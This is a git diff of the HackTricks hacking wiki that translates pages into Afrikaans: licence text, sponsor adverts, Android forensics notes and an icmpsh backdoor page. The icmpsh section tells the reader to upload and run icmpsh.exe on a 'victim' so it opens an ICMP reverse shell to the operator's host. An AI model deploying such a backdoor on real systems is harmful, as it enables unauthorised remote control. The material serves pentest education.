voldoen op enige redelike wyse gebaseer op die medium, middels, en konteks waarin U die Gelisensieerde Materiaal deel. Byvoorbeeld, dit mag redelik wees om aan die voorwaardes te voldoen deur 'n URI of skakel na 'n hulpbron te voorsien wat die vereiste inligting insluit. - ii. a copyright notice; +3. Indien versoek deur die Lisensiehouer, moet U enige van die inligting wat vereis word deur Artikel 3(a)(1)(A) verwyder, vir sover dit redelik uitvoerbaar is. - iii. a notice that refers to this Public License; +4. As U Aangepaste Materiaal wat U produseer deel, mag die Lisensie van die Aanpasser wat U toepas, nie ontvangers van die Aangepaste Materiaal verhoed om aan hierdie Openbare Lisensie te voldoen nie. - iv. a notice that refers to the disclaimer of warranties; +## Artikel 4 - Sui Generis Databasisregte. - v. a URI or hyperlink to the Licensed Material to the extent reasonably practicable; +Waar die Gelisensieerde Regte Sui Generis Databasisregte insluit wat van toepassing is op U gebruik van die Gelisensieerde Materiaal: - B. indicate if You modified the Licensed Material and retain an indication of any previous modifications; and +a. vir die vermyding van twyfel, verleen Artikel 2(a)(1) U die reg om al of 'n aansienlike gedeelte van die inhoud van die databasis te onttrek, hergebruik, verveelvoudig, en te deel vir nie-kommersiële doeleindes slegs; - C. indicate the Licensed Material is licensed under this Public License, and include the text of, or the URI or hyperlink to, this Public License. +b. as U al of 'n aansienlike gedeelte van die inhoud van die databasis insluit in 'n databasis waarin U Sui Generis Databasisregte het, dan is die databasis waarin U Sui Generis Databasisregte het (maar nie sy individuele inhoud nie) Aangepaste Materiaal; en - 2. You may satisfy the conditions in Section 3(a)(1) in any reasonable manner based on the medium, means, and context in which You Share the Licensed Material. For example, it may be reasonable to satisfy the conditions by providing a URI or hyperlink to a resource that includes the required information. +c. U moet voldoen aan die voorwaardes in Artikel 3(a) as U al of 'n aansienlike gedeelte van die inhoud van die databasis deel. - 3. If requested by the Licensor, You must remove any of the information required by Section 3(a)(1)(A) to the extent reasonably practicable. +Vir die vermyding van twyfel, vul +## Artikel 7 - Ander Voorwaardes en Bepalings. - 4. If You Share Adapted Material You produce, the Adapter's License You apply must not prevent recipients of the Adapted Material from complying with this Public License. +a. Die Lisensiehouer sal nie gebonde wees aan enige bykomende of verskillende terme of voorwaardes wat deur U gekommunikeer word tensy uitdruklik ooreengekom. -## Section 4 – Sui Generis Database Rights. +b. Enige reëlings, verstandhoudings of ooreenkomste met betrekking tot die Gelisensieerde Materiaal wat nie hierin vermeld word nie, is afsonderlik van en onafhanklik van die terme en voorwaardes van hierdie Openbare Lisensie. -Where the Licensed Rights include Sui Generis Database Rights that apply to Your use of the Licensed Material: +## Artikel 8 - Interpretasie. -a. for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, reuse, reproduce, and Share all or a substantial portion of the contents of the database for NonCommercial purposes only; +a. Ten einde twyfel te voorkom, verminder hierdie Openbare Lisensie nie, en mag nie geïnterpreteer word om, die gebruik van die Gelisensieerde Materiaal te beperk, beperk, beperk of voorwaardes op te lê wat wettiglik sonder toestemming onder hierdie Openbare Lisensie gemaak kan word nie. -b. if You include all or a substantial portion of the database contents in a database in which You have Sui Generis Database Rights, then the database in which You have Sui Generis Database Rights (but not its individual contents) is Adapted Material; and +b. Vir sover moontlik, as enige bepaling van hierdie Openbare Lisensie as onafdwingbaar beskou word, sal dit outomaties hervorm word tot die minimum mate wat nodig is om dit afdwingbaar te maak. As die bepaling nie hervorm kan word nie, sal dit van hierdie Openbare Lisensie afgesny word sonder om die afdwingbaarheid van die oorblywende terme en voorwaardes te beïnvloed. -c. You must comply with the conditions in Section 3(a) if You Share all or a substantial portion of the contents of the database. - -For the avoidance of doubt, this Section 4 supplements and does not replace Your obligations under this Public License where the Licensed Rights include other Copyright and Similar Rights. - -## Section 5 – Disclaimer of Warranties and Limitation of Liability. - -a. __Unless otherwise separately undertaken by the Licensor, to the extent possible, the Licensor offers the Licensed Material as-is and as-available, and makes no representations or warranties of any kind concerning the Licensed Material, whether express, implied, statutory, or other. This includes, without limitation, warranties of title, merchantability, fitness for a particular purpose, non-infringement, absence of latent or other defects, accuracy, or the presence or absence of errors, whether or not known or discoverable. Where disclaimers of warranties are not allowed in full or in part, this disclaimer may not apply to You.__ - -b. __To the extent possible, in no event will the Licensor be liable to You on any legal theory (including, without limitation, negligence) or otherwise for any direct, special, indirect, incidental, consequential, punitive, exemplary, or other losses, costs, expenses, or damages arising out of this Public License or use of the Licensed Material, even if the Licensor has been advised of the possibility of such losses, costs, expenses, or damages. Where a limitation of liability is not allowed in full or in part, this limitation may not apply to You.__ - -c. The disclaimer of warranties and limitation of liability provided above shall be interpreted in a manner that, to the extent possible, most closely approximates an absolute disclaimer and waiver of all liability. - -## Section 6 – Term and Termination. - -a. This Public License applies for the term of the Copyright and Similar Rights licensed here. However, if You fail to comply with this Public License, then Your rights under this Public License terminate automatically. - -b. Where Your right to use the Licensed Material has terminated under Section 6(a), it reinstates: - - 1. automatically as of the date the violation is cured, provided it is cured within 30 days of Your discovery of the violation; or - - 2. upon express reinstatement by the Licensor. - - For the avoidance of doubt, this Section 6(b) does not affect any right the Licensor may have to seek remedies for Your violations of this Public License. - -c. For the avoidance of doubt, the Licensor may also offer the Licensed Material under separate terms or conditions or stop distributing the Licensed Material at any time; however, doing so will not terminate this Public License. - -d. Sections 1, 5, 6, 7, and 8 survive termination of this Public License. - -## Section 7 – Other Terms and Conditions. - -a. The Licensor shall not be bound by any additional or different terms or conditions communicated by You unless expressly agreed. - -b. Any arrangements, understandings, or agreements regarding the Licensed Material not stated herein are separate from and independent of the terms and conditions of this Public License. - -## Section 8 – Interpretation. - -a. For the avoidance of doubt, this Public License does not, and shall not be interpreted to, reduce, limit, restrict, or impose conditions on any use of the Licensed Material that could lawfully be made without permission under this Public License. - -b. To the extent possible, if any provision of this Public License is deemed unenforceable, it shall be automatically reformed to the minimum extent necessary to make it enforceable. If the provision cannot be reformed, it shall be severed from this Public License without affecting the enforceability of the remaining terms and conditions. - -c. No term or condition of this Public License will be waived and no failure to comply consented to unless expressly agreed to by the Licensor. - -d. Nothing in this Public License constitutes or may be interpreted as a limitation upon, or waiver of, any privileges and immunities that apply to the Licensor or You, including from the legal processes of any jurisdiction or authority. +c. Geen term of voorwaarde van hierdie Openbare Lisensie sal afgesien word nie en geen versuim om te voldoen sal toegestem word tensy uitdruklik ooreengekom deur die Lisensiehouer. +d. Niks in hierdie Openbare Lisensie stel 'n beperking op, of afstand van, enige voorregte en immuniteite wat van toepassing is op die Lisensiehouer of U nie, insluitend van die regsprosesse van enige jurisdiksie of gesag. ``` -Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. +Creative Commons is not a party to its public licenses. Notwithstanding, Creative Commons may elect to apply one of its public licenses to material it publishes and in those instances will be considered the “Licensor.” Except for the limited purpose of indicating that material is shared under a Creative Commons public license or as otherwise permitted by the Creative Commons policies published at [creativecommons.org/policies](http://creativecommons.org/policies), Creative Commons does not authorize the use of the trademark “Creative Commons” or any other trademark or logo of Creative Commons without its prior written consent including, without limitation, in connection with any unauthorized modifications to any of its public licenses or any other arrangements, understandings, or agreements concerning use of licensed material. For the avoidance of doubt, this paragraph does not form part of the public licenses. Creative Commons may be contacted at [creativecommons.org](http://creativecommons.org/). ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/README.md b/README.md index 604662621..c75d76e4b 100644 --- a/README.md +++ b/README.md @@ -2,39 +2,39 @@
-_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks logo's & bewegingsontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ {% hint style="success" %} -**Welcome to the wiki where you will find each hacking trick/technique/whatever I have learnt from CTFs, real life apps, reading researches, and news.** +**Welkom by die wiki waar jy elke haktruk/tegniek/wat ek geleer het van CTF's, werklike toepassings, navorsing en nuus sal vind.** {% endhint %} -To get started follow this page where you will find the **typical flow** that **you should follow when pentesting** one or more **machines:** +Om te begin, volg hierdie bladsy waar jy die **tipiese vloei** sal vind wat **jy moet volg wanneer jy een of meer masjiene pentest:** {% content-ref url="generic-methodologies-and-resources/pentesting-methodology.md" %} [pentesting-methodology.md](generic-methodologies-and-resources/pentesting-methodology.md) {% endcontent-ref %} -## Platinum Sponsors +## Platinum Borge -_Your company could be here._ +_Jou maatskappy kan hier wees._ -## Corporate Sponsors +## Korporatiewe Borge ### [STM Cyber](https://www.stmcyber.com)
-[**STM Cyber**](https://www.stmcyber.com) is a great cybersecurity company whose slogan is **HACK THE UNHACKABLE**. They perform their own research and develop their own hacking tools to **offer several valuable cybersecurity services** like pentesting, Red teams and training. +[**STM Cyber**](https://www.stmcyber.com) is 'n uitstekende sibersekuriteitsmaatskappy met die leuse **HACK THE UNHACKABLE**. Hulle doen hul eie navorsing en ontwikkel hul eie hakwerkstukke om **verskeie waardevolle sibersekuriteitsdienste** soos pentesting, Rooi spanne en opleiding aan te bied. -You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stmcyber.com) +Jy kan hul **blog** besoek by [**https://blog.stmcyber.com**](https://blog.stmcyber.com) -**STM Cyber** also support cybersecurity open source projects like HackTricks :) +**STM Cyber** ondersteun ook sibersekuriteit oopbronprojekte soos HackTricks :) ### [RootedCON](https://www.rootedcon.com/)
-[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. +[**RootedCON**](https://www.rootedcon.com) is die belangrikste sibersekuriteitsgeleentheid in **Spanje** en een van die belangrikste in **Europa**. Met **die missie om tegniese kennis te bevorder**, is hierdie kongres 'n kookpunt vir tegnologie- en sibersekuriteitsprofessionals in elke dissipline. {% embed url="https://www.rootedcon.com/" %} @@ -42,9 +42,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
-**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.** +**Intigriti** is die **#1** etiese hak- en **foutbeloningsplatform in Europa.** -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Foutbeloningswenk**: **teken aan** vir **Intigriti**, 'n premium **foutbeloningsplatform wat deur hakkers, vir hakkers** geskep is! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin belonings verdien tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -53,9 +53,9 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools. +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome outomaties** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapswerkstukke. -Get Access Today: +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} @@ -63,13 +63,13 @@ Get Access Today:
-Stay a step ahead in the cybersecurity game. +Bly 'n tree voor in die sibersekuriteitspel. -[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) makes vulnerability management easy. Keep track of your attack surface, see where your company is vulnerable, and prioritize issues that leave your systems most exposed so you can focus on what matters most. +[**Intruder**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) maak foutbestuur maklik. Hou jou aanvalsoppervlak dop, sien waar jou maatskappy kwesbaar is, en prioritiseer kwessies wat jou stelsels die meeste blootstel sodat jy kan fokus op wat die belangrikste is. -Run thousands of checks with a single platform that covers your entire tech stack from internal infrastructure to web apps, APIs and cloud systems. Integrate seamlessly with [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) and streamline DevOps so your team can implement fixes faster. +Voer duisende kontroles uit met 'n enkele platform wat jou hele tegniese stapel van interne infrastruktuur tot webtoepassings, API's en wolkstelsels dek. Integreer naadloos met [AWS, GCP, Azure](https://www.intruder.io/cloud-vulnerability-scanning-for-aws-google-cloud-and-azure) en stroomlyn DevOps sodat jou span vinniger herstelwerk kan implementeer. -Intruder never rests. Round-the-clock protection monitors your systems 24/7. Want to learn more? Visit their site and take it for a spin with [**a free trial**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). +Intruder rus nooit nie. Rondom-die-klok beskerming monitor jou stelsels 24/7. Wil jy meer weet? Besoek hul webwerf en probeer dit uit met [**'n gratis toetslopie**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks). {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} @@ -77,26 +77,26 @@ Intruder never rests. Round-the-clock protection monitors your systems 24/7. Wan
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hakkers en foutbeloningsjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hakinsigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hak insluit -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Realtydse Haknuus**\ +Bly op hoogte van die vinnige hakwêreld deur realtydse nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platformopdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hakkers! *** -### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit +### [Pentest-Tools.com](https://pentest-tools.com/) - Die noodsaaklike penetrasietoetsingstoolkit
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. +**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognosering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporing- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, dop te maak en pret te hê. {% embed url="https://pentest-tools.com/" %} @@ -104,19 +104,18 @@ Stay informed with the newest bug bounties launching and crucial platform update
-[**WebSec**](https://websec.nl) is a professional cybersecurity company based in **Amsterdam** which helps **protecting** businesses **all over the world** against the latest cybersecurity threats by providing **offensive-security services** with a **modern** approach. +[**WebSec**](https://websec.nl) is 'n professionele sibersekuriteitsmaatskappy wat in **Amsterdam** gebaseer is en help om besighede **regoor die wêreld** teen die nuutste sibersekuriteitsdreigings te beskerm deur **offensiewe-sibersekuriteitsdienste** met 'n **moderne** benadering te bied. -WebSec is an **all-in-one security company** which means they do it all; Pentesting, **Security** Audits, Awareness Trainings, Phishing Campagnes, Code Review, Exploit Development, Security Experts Outsourcing and much more. +WebSec is 'n **alles-in-een sibersekuriteitsmaatskappy**, wat beteken dat hulle alles doen; Pentesting, **Sekerheids** Ouditse, Bewustheidsopleiding, Phishing-kampanjes, Kode-oorsig, Uitbuitingsontwikkeling, Uitbesteding van Sekuriteitskundiges en nog baie meer. -Another cool thing about WebSec is that unlike the industry average WebSec is **very confident in their skills**, to such an extent that they **guarantee the best quality results**, it states on their website "**If we can't hack it, You don't pay it!**". For more info take a look at their [**website**](https://websec.nl/en/) and [**blog**](https://websec.nl/blog/)! +'n Ander koel ding oor WebSec is dat hulle, in teenstelling met die bedryfsgemiddelde, **baie selfversekerd is in hul vaardighede**, tot so 'n mate dat hulle die beste kwaliteit resultate waarborg, dit staan op hul webwerf "**As ons dit nie kan hak nie, betaal jy nie daarvoor nie!**". Vir meer inligting kyk na hul [**webwerf**](https://websec.nl/en/) en [**blog**](https://websec.nl/blog/)! -In addition to the above WebSec is also a **committed supporter of HackTricks.** +Bo en behalwe die bogenoemde is WebSec ook 'n **toegewyde ondersteuner van HackTricks.** {% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %} +## Lisensie & Vrywaring -## License & Disclaimer - -**Check them in:** +**Kyk na hulle in:** {% content-ref url="welcome/hacktricks-values-and-faq.md" %} [hacktricks-values-and-faq.md](welcome/hacktricks-values-and-faq.md) @@ -124,14 +123,14 @@ In addition to the above WebSec is also a **committed supporter of HackTricks.**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
diff --git a/android-forensics.md b/android-forensics.md index 154e7909b..ae5b648ba 100644 --- a/android-forensics.md +++ b/android-forensics.md @@ -1,51 +1,51 @@ -# Android Forensics +# Android Forensika
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-## Locked Device +## Geslote Toestel -To start extracting data from an Android device it has to be unlocked. If it's locked you can: +Om data uit 'n Android-toestel te onttrek, moet dit oopgemaak word. As dit gesluit is, kan jy: -* Check if the device has debugging via USB activated. -* Check for a possible [smudge attack](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) -* Try with [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) +* Kyk of die toestel USB-afdeling aktief het. +* Kyk vir 'n moontlike [smudge-aanval](https://www.usenix.org/legacy/event/woot10/tech/full\_papers/Aviv.pdf) +* Probeer met [Brute-force](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/) -## Data Adquisition +## Data Verkryging -Create an [android backup using adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) and extract it using [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` +Skep 'n [Android-back-up met adb](mobile-pentesting/android-app-pentesting/adb-commands.md#backup) en onttrek dit met behulp van [Android Backup Extractor](https://sourceforge.net/projects/adbextractor/): `java -jar abe.jar unpack file.backup file.tar` -### If root access or physical connection to JTAG interface +### As daar worteltoegang of fisiese verbinding met JTAG-interface is -* `cat /proc/partitions` (search the path to the flash memory, generally the first entry is _mmcblk0_ and corresponds to the whole flash memory). -* `df /data` (Discover the block size of the system). -* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (execute it with the information gathered from the block size). +* `cat /proc/partitions` (soek die pad na die flitsgeheue, gewoonlik is die eerste inskrywing _mmcblk0_ en stem ooreen met die hele flitsgeheue). +* `df /data` (Ontdek die blokgrootte van die stelsel). +* dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096 (voer dit uit met die inligting wat ingesamel is van die blokgrootte). -### Memory +### Geheue -Use Linux Memory Extractor (LiME) to extract the RAM information. It's a kernel extension that should be loaded via adb. +Gebruik Linux Memory Extractor (LiME) om die RAM-inligting te onttrek. Dit is 'n kernel-uitbreiding wat gelaai moet word via adb.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/backdoors/icmpsh.md b/backdoors/icmpsh.md index af92f95f5..ceb4dee7a 100644 --- a/backdoors/icmpsh.md +++ b/backdoors/icmpsh.md @@ -1,62 +1,50 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-Download the backdoor from: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) +Laai die agterdeur af vanaf: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh) -# Client side +# Kliëntkant -Execute the script: **run.sh** - -**If you get some error, try to change the lines:** +Voer die skrip uit: **run.sh** +**As jy 'n fout kry, probeer om die lyne te verander:** ```bash IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1) IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }') ``` - -**For:** - +**Vir:** ```bash echo Please insert the IP where you want to listen read IP ``` +# **Slagofferkant** -# **Victim Side** - -Upload **icmpsh.exe** to the victim and execute: - +Laai **icmpsh.exe** op na die slagoffer se rekenaar en voer dit uit: ```bash icmpsh.exe -t -d 500 -b 30 -s 128 ``` - - -
